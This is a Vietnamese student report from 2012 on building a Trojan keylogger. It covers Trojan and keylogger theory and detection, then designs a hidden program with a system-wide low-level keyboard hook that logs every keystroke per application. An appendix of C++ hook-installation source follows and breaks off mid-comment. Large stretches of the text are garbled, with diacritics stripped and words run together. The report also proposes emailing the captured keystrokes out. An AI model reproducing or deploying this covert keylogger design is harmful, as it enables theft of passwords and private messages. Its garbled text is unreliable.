báo cáo môn an toàn thông tin mạng



    TRƯỜNG ĐẠI HỌC BÁCH KHOA

    KHOA CÔNG NGHỆ THÔNG TIN

    BỘ MÔN MẠNG VÀ TRUYỀN THÔNG

    AN TOÀN THÔNG TIN MẠNG Đề tài 15:

    Xây dựng chương trình

    Trojan Keylogger

    Gio vin hng dn : TS. NGUYN TN KHISinh vin thc hin : L PHAN SN ANH

    NGUYN H HI NGNG PHAN MINH HILp : 08T4

    Nhm : 12

    Đà Nẵng 2012


    Bo Co An Ton Thng Tin Mng

    MC LC

    MC LC ....................................................................................................................2Chng 1. C S L THUYT .................................................................................3

    1.1 Gii thiu ................................................................................................................31.2 Tm hiu v Trojan .................................................................................................5

    1.2.1 Cc dng Trojans c bn: .................................................................................51.2.2 Mc ch ca nhng k vit ra nhng Trojans: .................................................51.2.3 Nhng con ng my tnh nn nhn nhim Trojan: ...................................61.2.4 Nhng cch nhn bit mt my tnh b nhim Trojan: ......................................6

    1.3 Gii thiu v KeyLogger ........................................................................................71.3.1 KeyLogger l g? ..............................................................................................71.3.2 Phn loi KeyLogger: .......................................................................................71.3.3 Cch hot ng ca KeyLogger: .......................................................................8

    1.4 Cch pht hin v phng chng ..............................................................................91.4.1 Cch pht hin Trojan: ......................................................................................91.4.2 Cch phng chng: .........................................................................................13

    Chng 2. PHN TCH V THIT K CHNG TRNH ....................................142.1 M t bi ton .......................................................................................................142.2 Phn tch yu cu ..................................................................................................14

    2.2.1 Yu cu v chc nng: ....................................................................................142.2.2 Yu cu v giao din ngi dng: ..................................................................142.2.3 Yu cu v tng thch: ..................................................................................14

    2.3 Phn tch chc nng ..............................................................................................142.4 K thut Hook .......................................................................................................14

    2.4.1 Gii thiu: .......................................................................................................142.4.2 Chui Hook: ...................................................................................................152.4.3 Th tc Hook: .................................................................................................152.4.4 Cch s dng Hook: .......................................................................................16

    2.5 Thut ton .............................................................................................................172.5.1 Hm WriteStringToFile(char *txt): ................................................................172.5.2 Hm LogKeyboard: ........................................................................................17

    Chng 3. TRIN KHAI NH GI KT QU ....................................................183.1 Mi trng trin khai ............................................................................................183.2 Kt qu chc nng chng trnh ...........................................................................183.3 u v nhc im .................................................................................................20

    3.3.1 u im: .........................................................................................................203.3.2 Nhc im: ...................................................................................................20

    3.4 Hng pht trin ...................................................................................................2020

    TI LIU THAM KHO ..........................................................................................21PH LC ...................................................................................................................22

    SVTH: Sn Anh Hi ng Minh Hi 08T42


    Bo Co An Ton Thng Tin Mng

    Chương 1. CƠ SỞ LÝ THUYẾT

    1.1 Giới thiệu

    Một Trojan là một chương trình nhỏ chạy ở chế độ ẩn và gây hại cho máy tính.

    Với sự trợ giúp của Trojan, một kẻ tấn công có thể dễ dàng truy cập vào máy

    tính của nạn nhân để thực hiện một số việc nguy hại như lấy cắp dữ liệu, xóa file, và

    nhiều khả năng khác.

    Cng ging nh Nga Thnh Troy trong thn thoi trng c v nh l mt

    mn qu, nhng thc ra c cha lnh Hy Lp, bn chng chim thnh Troy. Trojan

    l mt chng trnh dng vi rt, mt k lm ni gin trong my tnh ca bn gip

    cho tn tin tc (hacker) iu khin my tnh ca bn, Trojan gip tn tin tc ly nhng

    thng tin qu bu ca bn, thm ch hn c th xa hoc nh dng li c cng cabn na. Trojan c th nhim vo my ca bn qua tp tin gn km th in t m

    bn v tnh ti v v chy th, hoc c ln trong nhng chng trnh tr chi,

    nhng chng trnh m bn khng r ngun gc

    moi rut c mt khu ca cc ch thu bao, hacker ni thng s dng

    vi rt c h Trojan (vi rt thnh Troa) gi n cc thu bao cn tn cng thng qua

    th in t (e-mail) di dng d liu nh km (File Attachment). Ch cn khi cc

    ch thu bao v tnh m file ny, lp tc vi rt Trojan c kch ng v t ng sao

    SVTH: Sn Anh Hi ng Minh Hi 08T43


    Bo Co An Ton Thng Tin Mng

    chp li tt c cc thng s v mt khu ca ch thu bao. Khng ch l mt khu truy

    cp Intemet m ngay c n mt khu ca hm th in t cng d dng b nh cp.

    Ngay sau khi ch thu bao kt ni Internet, vi rt Trojan s b mt sinh ra mt e- mail

    v gi mt khu nh cp v cho tin tc. V sau mi ln thay i mt khu virusTrojan s tip tc lng l tun ca n cp ti mt a ch m hacker ni nh sn.

    nh la nn nhn, tin tc lun tm cch ging ra nhng loi by ht

    sc tinh vi. Tinh vi n ni khng t ch thu bao d rt k tnh nhng vn c sp

    by nh thng. Ph bin nht l hacker ni i lt nhng t chc hay cng ty c uy

    tn nh la ch thu bao bng chng trnh phn mm th ma Ghostmail. tin

    tc d dng tho ra nhng e-mail mo danh vi ni dung: Hin gi tnh trng nh

    cp mt khu thu bao ang rt ph bin. Khi nhn c nhng tin kiu nh vy, c

    khng t thu bao d dng cn cu v c t nhin cho chy chng trnh vi rt

    Trojan m khng h nhn thc c rng h ang t nguyn hin mnh thnh nn

    nhn ca bn tin tc

    Nh vy, khi Trojan c kch hot trn my ca bn v khi bn truy cp

    Internet th Trojan c th ly mt khu truy cp mng, ly danh sch th in t v

    thm ch c cu hnh my tnh ca bn gi cho mt a ch th in t ca tn tintc. Nhng nguy him hn, Trojan cn gi c a ch mng IP, l a ch m nh cung

    cp dch v mng (ISP) gn cho bn lc truy cp; tn tin tc s s dng a ch IP ca

    bn thit lp kt ni t my tnh ca hn ti my tnh ca bn qua mng Internet.

    Trojan s ly thng tin, xa thng tin

    Tác hại của Trojan:

    * Xo hay vit li cc d liu trn my tnh.* Lm hng chc nng ca cc tp.

    * Ly nhim cc phn mm c tnh khc nh l virus.

    * Ci t mng my c th b iu khin bi my khc hay dng my nhim gi th nhng lm.

    * c ln cc thng tin cn thit v gi bo co n ni khc.

    * n cp thng tin nh l mt khu v s th tn dng.

    * c cc chi tit ti khon ngn hng v dng vo cc mc tiu phm ti.SVTH: Sn Anh Hi ng Minh Hi 08T4

    4

    http://npower.vn/tag/virus-trojan/http://npower.vn/tag/virus-trojan/http://npower.vn/tag/cai-dat-mang/http://npower.vn/tag/cai-dat-mang/http://npower.vn/tag/virus-trojan/http://npower.vn/tag/virus-trojan/

    Bo Co An Ton Thng Tin Mng

    * Ci t ln cc phn mm cha c cho php.

    1.2 Tìm hiểu về Trojan

    K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi

    chng Online. Sau c th truy cp v iu khin ton b my tnh ca nn nhn, v

    chng c kh nng s dng vo nhiu mc ch khc nhau.

    1.2.1 Các dạng Trojans cơ bản:

    * Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa.

    * Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng.

    * Destructive Trojans Ph hy h thng.

    * Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS.

    * Proxy Trojans.

    * HTTP, FTP Trojans - Trojan t to thnh HTTP hay FTP server k tn

    cng khai thc li.

    * Security Software Disable Trojan.

    1.2.2 Mục đích của những kẻ viết ra những Trojans:

    * Ly thng tin ca cc ti khon c nhn nh: Email, Password,

    * Nhng d liu mt.

    * Thng tin ti chnh: Ti khon ngn hng

    * S dng my tnh ca nn nhn thc hin mt tc v no , nh tn

    cng, scan, hay lm ngp h thng mng ca nn nhn.

    SVTH: Sn Anh Hi ng Minh Hi 08T45


    Bo Co An Ton Thng Tin Mng

    1.2.3 Những con đường máy tính nạn nhân nhiễm Trojan:

    * Qua cc ng dng CHAT online nh IRC Interney Relay Chat.

    * Qua cc file c nh km trn Mail

    * Qua tng vt l nh trao i d liu qua USB, CD, HDD

    * Khi chy mt file b nhim Trojan.

    * Qua NetBIOS FileSharing.

    * Qua nhng chng trnh nguy him.

    * T nhng trang web khng tin tng hay nhng website cung cp phn mm

    min ph.

    * N c kh nng n trong cc ng dng bnh thng, khi chy ng dng

    lp tc cng chy lun Trojans.

    1.2.4 Những cách nhận biết một máy tính bị nhiễm Trojan:

    * CD-ROM t ng m ra ng vo.

    * My tnh c nhng du hiu l trn mn hnh.

    * Hnh nn ca cc ca s Windows b thay i

    * Cc vn bn t ng in.

    * My tinh t ng thay i font ch v cc thit lp khc.

    * Hnh nn my tnh t ng thay i v khng th i li.

    * Chut tri, chut phi ln ln.

    * Chut khng hin th trn mn hnh.

    * Nt Start khng hin th.

    SVTH: Sn Anh Hi ng Minh Hi 08T46


    Bo Co An Ton Thng Tin Mng

    1.3 Giới thiệu về KeyLogger

    1.3.1 KeyLogger là gì?

    Keylogger hay "trnh theo di thao tc bn phm" theo cch dch ra ting

    Vit l mt chng trnh my tnh ban u c vit nhm mc ch theo di v ghi

    li mi thao tc thc hin trn bn phm vo mt tp tin nht k (log) cho ngi ci

    t n s dng. V chc nng mang tnh vi phm vo ring t ca ngi khc ny nn

    cc trnh keylogger c xp vo nhm ccphn mm gin ip.

    V sau, khi keylogger pht trin cao hn n khng nhng ghi li thao tc bn

    phm m cn ghi li c cc hnh nh hin th trn mn hnh (screen) bng cch chp

    (screen-shot) hoc quay phim (screen-capture) thm ch cn ghi nhn cch con

    tr chut trn my tnh di chuyn.

    1.3.2 Phân loại KeyLogger:

    Keylogger bao gm hai loi, mt loi keyloggerphn cngv mt loi lphn

    mm. Bi vit ny ni n loi phn mm.

    Theo nhng ngilp trnh, keylogger vit ra vi ch c mt loi duy nht l

    gip cc bn gim st con ci, ngi thn xem h lm g viPC, viinternet,

    khichatvi ngi l. Nhng cch s dng v chc nng ca keylogger hin ti trn

    th gii khin ngi ta thng hay phn loi keylogger theo mc nguy him bng

    cc cu hi:

    Nhim vo my khng qua ci t/Ci t vo my cc nhanh (quick install)?

    C thuc tnh n/giu trn trnh qun l tin trnh (process manager) v trnh ci

    t v g b chng trnh (Add or Remove Program)?

    Theo di khng thng bo/PC b nhim kh t pht hin?

    C thm chc nng Capturescreen hoc ghi li thao tc chut?

    SVTH: Sn Anh Hi ng Minh Hi 08T47

    http://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81m_gi%C3%A1n_%C4%91i%E1%BB%87phttp://vi.wikipedia.org/wiki/M%C3%A0n_h%C3%ACnhhttp://vi.wikipedia.org/wiki/Chu%E1%BB%99thttp://vi.wikipedia.org/wiki/M%C3%A1y_t%C3%ADnhhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_c%E1%BB%A9nghttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/L%E1%BA%ADp_tr%C3%ACnhhttp://vi.wikipedia.org/wiki/PChttp://vi.wikipedia.org/wiki/Internethttp://vi.wikipedia.org/w/index.php?title=Chat&action=edit&redlink=1http://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ti%E1%BA%BFng_Vi%E1%BB%87thttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81m_gi%C3%A1n_%C4%91i%E1%BB%87phttp://vi.wikipedia.org/wiki/M%C3%A0n_h%C3%ACnhhttp://vi.wikipedia.org/wiki/Chu%E1%BB%99thttp://vi.wikipedia.org/wiki/M%C3%A1y_t%C3%ADnhhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_c%E1%BB%A9nghttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/Ph%E1%BA%A7n_m%E1%BB%81mhttp://vi.wikipedia.org/wiki/L%E1%BA%ADp_tr%C3%ACnhhttp://vi.wikipedia.org/wiki/PChttp://vi.wikipedia.org/wiki/Internethttp://vi.wikipedia.org/w/index.php?title=Chat&action=edit&redlink=1

    Bo Co An Ton Thng Tin Mng

    Kh tho g?

    C kh nng ly nhim, chng tt (kill process)?

    C mi cu tr li "c", cho mt im. im cng cao, keylogger cng vt

    khi mc chgim st (monitoring) n vi mc ch do thm(spying) v tnh nguy

    him n cng cao. Keylogger c th c phn loi theo s im:

    Loi s 1

    Khng im: keylogger loi bnh thng; chy cng khai, c thng bo cho

    ngi b theo di, ng vi mc ch gim st.

    Loi s 2

    Mt n hai im: keylogger nguy him; chy ngm, hng n mc ch do

    thm nhiu hn l gim st (nguy hi n cc thng tin c nhn nh l ti khon c

    nhn, mt khu, th tn dng v ngi dng khng bit).

    Loi s 3

    Ba n nm im: keylogger loi rt nguy him; n du hon ton theo di trn

    mt phm vi rng, mc ch do thm r rng.

    Loi s 4

    Su im: keylogger nguy him nghim trng, thng c mang theo bi cc

    trojan-virus cc k kh tho g, l loi keylogger nguy him nht. Chnh v vy (v

    cng do ng thi l ng bn ca trojan-virus) n thng hay b cc chng trnh

    chng virus tm thy v tiu dit.

    1.3.3 Cách hoạt động của KeyLogger:

    1.3.3.1 Thành phần của Keylogger

    Thng thng, mt chng trnh keylogger s gm c ba phn chnh:

    Chng trnh iu khin (Control Program): dng theo iu phi hot ng,

    tinh chnh cc thit lp, xem cc tp tin nht k cho Keylogger. Phn ny l phn

    c giu k nht ca keylogger, thng thng ch c th gi ra bng mt t hp

    phm tt c bit.

    SVTH: Sn Anh Hi ng Minh Hi 08T48

    http://vi.wikipedia.org/w/index.php?title=Gi%C3%A1m_s%C3%A1t&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Do_th%C3%A1m&action=edit&redlink=1http://vi.wikipedia.org/wiki/Ch%C6%B0%C6%A1ng_tr%C3%ACnhhttp://vi.wikipedia.org/w/index.php?title=Gi%C3%A1m_s%C3%A1t&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Do_th%C3%A1m&action=edit&redlink=1http://vi.wikipedia.org/wiki/Ch%C6%B0%C6%A1ng_tr%C3%ACnh

    Bo Co An Ton Thng Tin Mng

    Tp tin hook, hoc l mt chng trnh monitor dng ghi nhn li cc thao

    tc bn phm, capture screen (y l phn quan trng nht)

    Tp tin nht k (log), ni cha ng/ghi li ton b nhng g hook ghi nhn

    c.

    Ngoi ra, ty theo loi c th c thm phn chng trnh bo v (guard,

    protect), chng trnh thng bo (report)

    1.3.3.2 Cách thức cài đặt vào máy

    Cc loi keylogger t 1 - 3 thng thng khi ci t vo my cng ging nh

    mi chng trnh my tnh khc, u phi qua bc ci t. u tin n s ci t cc

    tp tin dng hot ng vo mt th mc c bit (rt phc tp), sau ng k

    cch thc hot ng ri i ngi dng thit lp thm cc ng dng. Sau n bt

    u hot ng.

    Loi keylogger s 4 c th vo thng my ca ngi dng b qua bc ci t,

    dng tnh nng autorun cng chy vi h thng. Mt s loi t th (drop) mnh vo

    cc chng trnh khc, khi ngi dng s dng cc chng trnh ny keylogger st ng chy theo.

    1.3.3.3 Cách hoạt động

    Trong mt h thng (Windows, Linux, Mac), khi bm 1 phm trn bn phm,

    bn phm s chuyn n thnh tnh hiu chuyn vo CPU. CPU s chuyn n ti h

    iu hnh h iu hnh dch thnh ch hoc s cho chnh n hoc cc chng trnh

    khc s dng.

    Nhng khi trong h thng c keylogger, khng nhng ch c h iu hnh

    theo di m c hook file/monitor program ca keylogger theo di n s ghi nhn v

    dch li cc tnh hiu ghi vo tp tin nht k. ng thi n cn c th theo di c mn

    hnh v thao tc chut.

    1.4 Cách phát hiện và phòng chống

    1.4.1 Cách phát hiện Trojan: Có ba nguyên lý của bất kỳ chương trình Trojan nào:

    SVTH: Sn Anh Hi ng Minh Hi 08T49

    http://vi.wikipedia.org/w/index.php?title=Th%C6%B0_m%E1%BB%A5c&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Th%C6%B0_m%E1%BB%A5c&action=edit&redlink=1

    Bo Co An Ton Thng Tin Mng

    - Một trojan muốn hoạt động phải lắng nghe các request trên một cổng nào đó

    - Một chương trình đang chạy sẽ phải có TÊN trong Process List

    - Một chương trình Trojan sẽ luôn chạy cùng lúc khi máy tính khởi động.

    1.4.1.1 Phát hiện Port sử dụng bởi Trojans:

    - Dùng câu lệnh Netstat -an trong Windows để biết hệ thống đang lắng nghe trên các port nào.

    + Hình dưới ta thấy có port 7777 đây là port của Tini Trojan.

    + Ta thấy port 8800 đang chờ nghe và có máy đang kết nối đến, có thể là của Trojans.

    - Dùng phần mềm Fport

    - Dùng phần mềm TCPView

    Ta có thể xem toàn bộ các port đang sử dụng và chương trình gì đang sử dụng port nào.

    Từ đây ta có thể kiểm tra các dịch vụ mạng với những Port nghi ngờ ta có thể dùng Firewall đóng lại.

    SVTH: Sn Anh Hi ng Minh Hi 08T410


    Bo Co An Ton Thng Tin Mng

    SVTH: Sn Anh Hi ng Minh Hi 08T411


    Bo Co An Ton Thng Tin Mng

    1.4.1.2 Cách phát hiện các chương trình đang chạy:

    - Dùng phần mềm Process Viewer tất cả các Process sẽ được hiển thị dù có đang chạy ở chế độ ẩn và không hiện trên Task Manager của Windows.

    SVTH: Sn Anh Hi ng Minh Hi 08T412


    Bo Co An Ton Thng Tin Mng

    1.4.1.3 Tìm một chương trình chạy lúc khởi động:

    - Trong Startup

    - Trong Registry: đa số sẽ nằm tại đây: Chúng ta sử dụng câu lệnh Msconfig

    trong Table Startup chương trình nào muốn chạy tự động sẽ phải nằm tại đây.

    Trong ví dụ này có file nc.exe chạy lúc khởi động và vị trí của nó là tại folder c:\vnexperts.net

    1.4.2 Cách phòng chống:

    - Không sử dụng các phần mềm không tin tưởng (đôi khi tin tưởng vẫn bị dính

    Trojans).

    - Không vào các trang web nguy hiểm, không cài các ActiveX và JavaScript trên các trang web bởi có thể sẽ đính kèm Trojans.

    - Tối quan trọng là phải update OS thường xuyên.

    - Cài phần mềm diệt virus uy tín như: Kaspersky Internet Security, Norton Internet Security, và Mcafee Total Security. Sau khi cài các phần mềm này bạn hãy update nó thường xuyên.

    SVTH: Sn Anh Hi ng Minh Hi 08T413


    Bo Co An Ton Thng Tin Mng

    Chương 2. PHÂN TÍCH VÀ THIẾT KẾ CHƯƠNG TRÌNH

    2.1 Mô tả bài toán

    Xây dựng một chương trình Trojan Keylogger có khả năng ghi lại các thao tác

    bàn phím của các chương trình mà người dùng đang sử dụng.

    2.2 Phân tích yêu cầu

    2.2.1 Yêu cầu về chức năng:

    Chương trình ghi lại toàn bộ thao tác phím của người dùng và lưu ra một tập

    tin văn bản.

    2.2.2 Yêu cầu về giao diện người dùng:

    Đây là chương trình mang tính chất gián điệp nên sẽ được chạy ẩn trong hệ

    thống và không có giao diện đồ họa, người dùng chỉ có thể xem qua Task Manager.

    2.2.3 Yêu cầu về tương thích:

    Để đảm bảo được sự tương tác tốt nhất với window, trong chương trình này

    chúng em sử dụng ngôn ngữ C++ trên môi trường Dev C++, Visual C++.

    2.3 Phân tích chức năng

    - Phân tích các tiến trình, cửa sổ đang nhập dữ liệu.

    - Ghi lại toàn bộ thao tác bàn phím.

    - Lưu ra các tập tin văn bản theo ngày tháng và tên ứng dụng.

    2.4 Kỹ thuật Hook

    2.4.1 Giới thiệu:

    Hook l mt k thut x l thng ip rt mnh cho php chng ta can thip

    su vo cc tin trnh khc nhau, nhng n lm nh hng ti tc ca h thng,

    nht l hook system-wide, v tt c cc s kin ca h thng s c nh hng ti

    mt hm no , r rng iu ny lm h thng chm i ng k. V th ta ch hn

    SVTH: Sn Anh Hi ng Minh Hi 08T414


    Bo Co An Ton Thng Tin Mng

    hook nhng thng ip tht cn thit v kt thc vic hook ngay khi khng dng n

    na.

    Cc m hnh Hook:

    - Local hook: l k thut Hook dng by s kin ngay trong tin trnh ci

    t.

    - Remote hook: l k thut Hook cho php by cc s kin thuc tin trnh ca

    ng dng khc. Trong m hnh ny li tn ti hai kiu hook khc :

    + Thread-specific : kiu Hook ny s by s kin ca mt lung c th.

    + System-wide : by s kin ca tt c cc lung trong tt c cc tin

    trnh ang thi hnh trong h thng.

    Thnh phn ca Hook:

    Chui Hook

    Th tc Hook

    Cc kiu Hook

    2.4.2 Chuỗi Hook:

    H thng c kh nng h tr nhiu kiu hook khc nhau, mi kiu li c quy

    nh mt cch thc truy nhp khc nhau trong k thut iu khin thng ip. Do vy,

    h thng duy tr mt chui cc hook cho mi mt kiu hook khc nhau.

    Mt chui hook l mt danh sch cc con tr c bit, n c tr ti cc hm

    CallBack gi l hook procedure (th tc hook). Nh vy khi mt s kin xut hin, h

    thng s chuyn s kin ti cc th tc hook c tham chiu bi chui hook theoth t ln lt. V th phi thc hin xong th tc ny mi c gi th tc k tip.

    2.4.3 Thủ tục Hook:

    Th tc hook s l ni thc hin cc thao tc sau khi bt c mt s kin

    mong mun. Cc th tc hook ph thuc vo cc kiu hook khc nhau m c cu trc,

    chc nng khc nhau. C th tc ch c th iu khin thng ip, mt s khc c th

    sa i thng ip, dng tin trnh ca thng ip, ngn cn thc hin hook tip theohoc a ti ca s cui cng

    SVTH: Sn Anh Hi ng Minh Hi 08T415


    Bo Co An Ton Thng Tin Mng

    Th tc hook c dng chung nh sau:

    LRESULT CALLBACK HookProc( int nCode, WPARAM wParam,

    LPARAM lParam );

    Trong :

    - HookProc: l tn i din ca th tc hook c ci t

    - nCode : y l m hook, n quyt nh ton b hot ng ca th tc hook,

    m hook ph thuc vo kiu hook v mi kiu hook c gn cho mt k t thit

    lp m hook.

    - wParam, lParam: Hai tham s ny cha cc thng tin v thng ip c

    hook v n ph thuc vo m hook (nCode).

    2.4.4 Cách sử dụng Hook:

    2.4.4.1 Cài đặt Hook

    Ta c th ci t th tc hook vo chui hook bng vic gi hm

    SetWindowsHookEx v ch ra kiu hook ang gi th tc, vic ci t hook c th

    thc hin trn mi tin trnh trong h thng.

    Nu s dng hook ton cc th phi t trong th vin lin kt ng (DLL).

    ng dng mun s dng th vin lin kt ng phi ly c handle ca th vin .

    nhn Handle ca th vin lin kt ng ta c th s dng hm LoadLibrary vi

    tham s l tn ca th vin. Sau khi c c Handle ca DLL, ta s ly a ch ca th

    tc hook trong th vin lin kt ng thng qua hm GetProcAddress. Sau khi c

    th tc hook, s dng hm SetWindowsHookEx ci t th tc hook vo trong

    chui hook.

    2.4.4.2 Giải phóng Hook

    Nh ni th hook nn c b i nu nh khng cn thit na bng cch s

    dng hm UnhookWindowsHookEx.

    Vi thread-specific hook, vic s dng hm UnhookWindowsHookEx s gii

    phng th tc hook. Tuy nhin vi hook ton tc (system-wide hook) th hm ny

    khng th tr t do cho hm DLL. Vic gi hm LoadLibrary s gi trong ng cnh

    ca tt c cc tin trnh, tuy nhin hm FreeLibrary th khng th thc hin vi cc

    SVTH: Sn Anh Hi ng Minh Hi 08T416


    Bo Co An Ton Thng Tin Mng

    tin trnh khc. V vy, khng c cch no gii phng DLL. H thng ch c th

    gii phng DLL khi tt c cc tin trnh lin kt ti DLL phi kt thc hoc gi

    FreeLibrary.

    Gii php t ra cho vn ny l xy dng hm ci t ngay trong th vinDLL. Bng vic lin kt ti DLL, ng dng c th ci t hook. V ngay trong DLL

    cng phi c hm gii phng hook gii phng khi khng cn n na.

    2.5 Thuật toán

    2.5.1 Hàm WriteStringToFile(char *txt):

    - Gi hm GetLocalTime(&st) ly thi gian ca h thng gn vo st.

    - Gi hm GetForegroundWindow() ly a ch ca ca s ang s dng.

    - Truyn a ch ca s va tm c vo hm GetWindowThreadProcessId

    ly a ch ng dng ang chy vo bin processID.

    - M (nu c) hoc to mi (nu cha c) mt file text vi tn l ngy v

    tn ng dng ang chy.

    sprintf(str,"d:\\key-%d_%d_%d-%s.txt" ,st.wYear,st.wMonth,st.wDay,GetExecutor(processID));out=fopen(str,"a");

    - Ghi k t txt vo file va m.

    2.5.2 Hàm LogKeyboard:

    - Khai bo 1 con tr keycode kiu KBDLLHOOKSTRUCT cha thng tin s

    kin u vo ca bn phm.

    - Nu phm bm l ci phm c bit th gi hm WriteStringToFile ghivo file nhng cm t tng ng vi phm .

    if(keycode->vkCode == VK_RETURN) WriteStringToFile("{Enter}");if(keycode->vkCode == VK_BACK) WriteStringToFile("{Backspace}");

    if(keycode->vkCode == VK_DELETE) WriteStringToFile("{Delete}"); if(keycode->vkCode == VK_HOME) WriteStringToFile("{Home}"); if(keycode->vkCode == VK_END) WriteStringToFile("{End}"); if(keycode->vkCode == VK_LEFT) WriteStringToFile("{Left}"); if(keycode->vkCode == VK_RIGHT) WriteStringToFile("{Right}"); if(keycode->vkCode == VK_UP) WriteStringToFile("{Up}"); if(keycode->vkCode == VK_DOWN) WriteStringToFile("{Down}");

    - Cn li th ghi vo file vi k t tng ng ca phm bm .

    SVTH: Sn Anh Hi ng Minh Hi 08T417


    Bo Co An Ton Thng Tin Mng

    Chương 3. TRIỂN KHAI ĐÁNH GIÁ KẾT QUẢ

    3.1 Môi trường triển khai

    Phần mềm được triển khai chạy thử trên các phiên bản của Win7.

    3.2 Kết quả chức năng chương trình

    Kết quả khi chạy chương trình.

    Hình 1 Chương trình Jaam.exe chạy ngầm

    SVTH: Sn Anh Hi ng Minh Hi 08T418


    Bo Co An Ton Thng Tin Mng

    Hình 2 Sử dụng ứng dụng Yahoo Messenger

    Hình 3 Kết quả ghi được từ chương trình

    Hình 4 Nội dung một tập tin log

    SVTH: Sn Anh Hi ng Minh Hi 08T419


    Bo Co An Ton Thng Tin Mng

    3.3 Ưu và nhược điểm

    Sau khi triển khai chạy thử ứng dụng, nhóm chúng em rút ra các nhận xét đánh

    giá sau:
    3.3.1 Ưu điểm:

    - Chương trình không làm tăng đáng kể thời gian hiển thị phím bấm.

    - Chương trình ghi lại được 100% thao tác phím.

    - Các tập tin ghi lại theo ngày và ứng dụng mà người sử dụng gõ phím thông

    tin chính xác 100%.

    3.3.2 Nhược điểm:

    - Vẫn còn ký tự lạ trong bản log. Nguyên nhân là do các ký tự Unicode được

    trả về từ chương trình Unikey.

    - Vì chương trình bắt tất cả thao tác bàn phím của tất cả các ứng dụng được

    chạy nên tạo ra hơi nhiều file text dư thừa.

    3.4 Hướng phát triển

    - Tạo ra file cấu hình cho chương trình Trojan để có thể xử lý bắt phím bấm

    của các ứng dụng mà người dùng quan tâm.

    - Phát triển Trojan tự gửi thông tin về mail.

    SVTH: Sn Anh Hi ng Minh Hi 08T420


    Bo Co An Ton Thng Tin Mng

    TÀI LIỆU THAM KHẢO

    - Website wikipedia.org

    - Software Requirement Specification Template IEEE

    - An Analysis of the System

    Salman A. Baset and Henning Schulzrinne

    Department of Computer Science

    Columbia University, New York NY 10027

    {salman,hgs}@cs.columbia.edu

    September 15, 2004

    SVTH: Sn Anh Hi ng Minh Hi 08T421


    Bo Co An Ton Thng Tin Mng

    PHỤ LỤC

    Tập tin thi hành Jaam.exe

    #include"stdafx.h"#include
    /* NOTE(review): the second #include lost its header name in extraction (an
       angle-bracket header swallowed as markup). The Win32 names used below
       (HINSTANCE, HHOOK, LRESULT, ...) must come from it. */

    /* Declare Windows procedure */
    LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

    /* Make the class name into a global variable.
       Nothing in this listing registers a window class with it, so it is
       unused as shown. */
    char szClassName[ ] = "WindowsApp";

    /* Module handle of the hook DLL; WinMain fills it via LoadLibrary("Hooker"). */
    HINSTANCE hinstDLL;
    /* Handle from SetWindowsHookEx; WindowProcedure resets it on WM_DESTROY. */
    HHOOK hHook = NULL;
    /* Type of the DLL's SetGlobalHook export (takes the hook handle, returns nothing).
       "typedefVOID" is an extraction artefact: the space after typedef was lost. */
    typedefVOID (*LOADPROC)(HHOOK hHook);

    /*
     * Entry point of Jaam.exe.
     *
     * Loads the hook DLL, resolves its LogKeyboard export and installs it as a
     * WH_KEYBOARD_LL hook, hands the resulting hook handle back to the DLL through
     * its SetGlobalHook export, then pumps messages until GetMessage returns 0.
     *
     * Parameters are the standard WinMain arguments; none of them is read here.
     * Returns messages.wParam after the loop ends, or 0 on any setup failure.
     *
     * Review notes (all visible in the lines below):
     *  - LoadLibrary(TEXT("Hooker")) names the DLL without a path, so it is found
     *    through the normal DLL search order rather than a fixed location.
     *  - SetWindowsHookEx is called with dwThreadId 0, i.e. the hook applies to
     *    every thread on the desktop. A WH_KEYBOARD_LL callback runs in the
     *    installing thread's context, which is why the message loop below must keep
     *    running for keystrokes to be delivered.
     *  - No RegisterClass/CreateWindow call appears in this listing, so
     *    WindowProcedure (and its WM_DESTROY unhook path) is not reachable as shown;
     *    the hook stays installed until the process exits.
     *  - lpr (SetGlobalHook) is called without a NULL check, unlike the two earlier
     *    lookups.
     */
    int WINAPI WinMain (HINSTANCE hThisInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,
        int nFunsterStil)
    {
        hinstDLL = LoadLibrary(TEXT("Hooker"));
        if(hinstDLL == NULL) { MessageBox(0,L"Not found.",L"Error",0); return 0; }
        HOOKPROC hpr = (HOOKPROC)GetProcAddress(hinstDLL,"LogKeyboard");
        if(hpr == NULL) { MessageBox(0,L"Unvail lib.",L"Error",0); return 0; }
        /* Low-level keyboard hook, all threads (last argument 0). */
        hHook = SetWindowsHookEx(WH_KEYBOARD_LL, hpr, hinstDLL, 0);
        if(hHook == NULL) { MessageBox(0,L"Corrupt lib.",L"Error",0); return 0; }
        /* Give the DLL the hook handle so its callback can call CallNextHookEx. */
        LOADPROC lpr = (LOADPROC)GetProcAddress(hinstDLL,"SetGlobalHook");
        lpr(hHook);
        HWND hwnd; /* This is the handle for our window (never assigned in this listing) */
        MSG messages; /* Here messages to the application are saved */
        /* Run the message loop. It will run until GetMessage() returns 0 */
        while (GetMessage (&messages, NULL, 0, 0))
        {
            /* Translate virtual-key messages into character messages */
            TranslateMessage(&messages);
            /* Send message to WindowProcedure */
            DispatchMessage(&messages);
        }
        /* The program return-value is 0 - The value that PostQuitMessage() gave */
        return messages.wParam;
    }

    /* This function is called by the Windows function DispatchMessage().
       On WM_DESTROY it posts WM_QUIT and removes the keyboard hook; every other
